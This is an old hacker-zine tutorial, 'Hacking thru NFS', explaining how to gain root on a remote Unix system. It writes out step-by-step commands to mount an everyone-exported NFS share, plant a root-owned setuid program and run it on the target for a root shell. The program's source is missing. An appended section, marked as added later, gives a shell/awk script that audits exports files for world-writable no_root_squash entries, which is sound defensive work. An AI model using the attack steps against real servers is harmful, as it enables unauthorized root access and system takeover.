00101: Hacking thru NFS

By: Cain

You are searching around for a system to hack. One of the things you should
check is whether they export any of the directories to everyone. Unfortunately
you need a shell on the system to do this. But if you do, then this is an
easy way to get root.

Your local system:
# showmount -r remote.com
Export list for remote.com:
/var/lib/stuff (everyone)
# mount remote.com:/var/lib/stuff /mnt
# cp hackprog /mnt
# chown root.root /mnt/hackprog
# chmod 4701 /mnt/hackprog
# umount /mnt
Their system:
$ cd /var/lib/stuff
$ hackprog
bash#

I chose the directories at random. But if you see anything like
/path/to/exported/directory (everyone)
in a showmount -r listing, you can mount that directory and have complete
access (read, write, execute) to it. So if you put a rewting
proggy:

main()
[the body of the program listing was an image that is missing from the page]

and make the owner root and chmod it to 4701 (setuid), then you can run that
program from the system exporting that directory and get a rewt shell.
Unfortunately you must be root to mount an NFS share; otherwise you could
obtain a rewt shell on every system you got on. But oh well.
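From the server's side, what makes this work is an export that any client may write to with root_squash turned off, so that root on the client can chown the file to root on the server. The audit script below is added here and is not from the zine; it assumes Linux /etc/exports syntax and the showmount output format quoted above, and runs against constructed sample data.

```shell
# Constructed sample /etc/exports in Linux exportfs syntax (not from any real host).
SAMPLE_EXPORTS='# constructed sample exports file
/var/lib/stuff   *(rw,no_root_squash)
/srv/pub         *(ro)
/home            10.0.0.0/24(rw,root_squash)
/data            (rw)'

# Constructed showmount listing in the format quoted above.
SAMPLE_SHOWMOUNT='Export list for remote.com:
/var/lib/stuff (everyone)
/home          10.0.0.0/24'

# Print the paths a showmount listing shows as exported to everyone.
everyone_exports() {
    printf '%s\n' "$1" | awk 'NR > 1 && $NF == "(everyone)" { print $1 }'
}

# Print "path options" for each export that any client ("*" or no client
# given) may write to with root_squash disabled: the server-side condition
# that lets a client root plant a setuid-root file. With root_squash (the
# Linux default) client root is mapped to nobody and the chown to root fails.
risky_exports() {
    printf '%s\n' "$1" | awk '
        /^[ \t]*(#|$)/ { next }
        {
            sub(/^[ \t]+/, "")
            path = $1
            n = split(substr($0, length(path) + 1), ents, /[ \t]+/)
            for (i = 1; i <= n; i++) {
                e = ents[i]
                if (e == "") continue
                client = e; opts = ""
                if (match(e, /\(.*\)/)) {
                    client = substr(e, 1, RSTART - 1)
                    opts = substr(e, RSTART + 1, RLENGTH - 2)
                }
                everyone = (client == "" || client == "*")
                writable = (opts ~ /(^|,)rw(,|$)/)
                nosquash = (opts ~ /(^|,)no_root_squash(,|$)/)
                if (everyone && writable && nosquash) print path, opts
            }
        }'
}

# Usage: run both checks against the constructed samples.
everyone_exports "$SAMPLE_SHOWMOUNT"
risky_exports "$SAMPLE_EXPORTS"
```

Only the first sample export is flagged: the ro export cannot be written, the /home export is limited to one network, and /data keeps the default root_squash.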
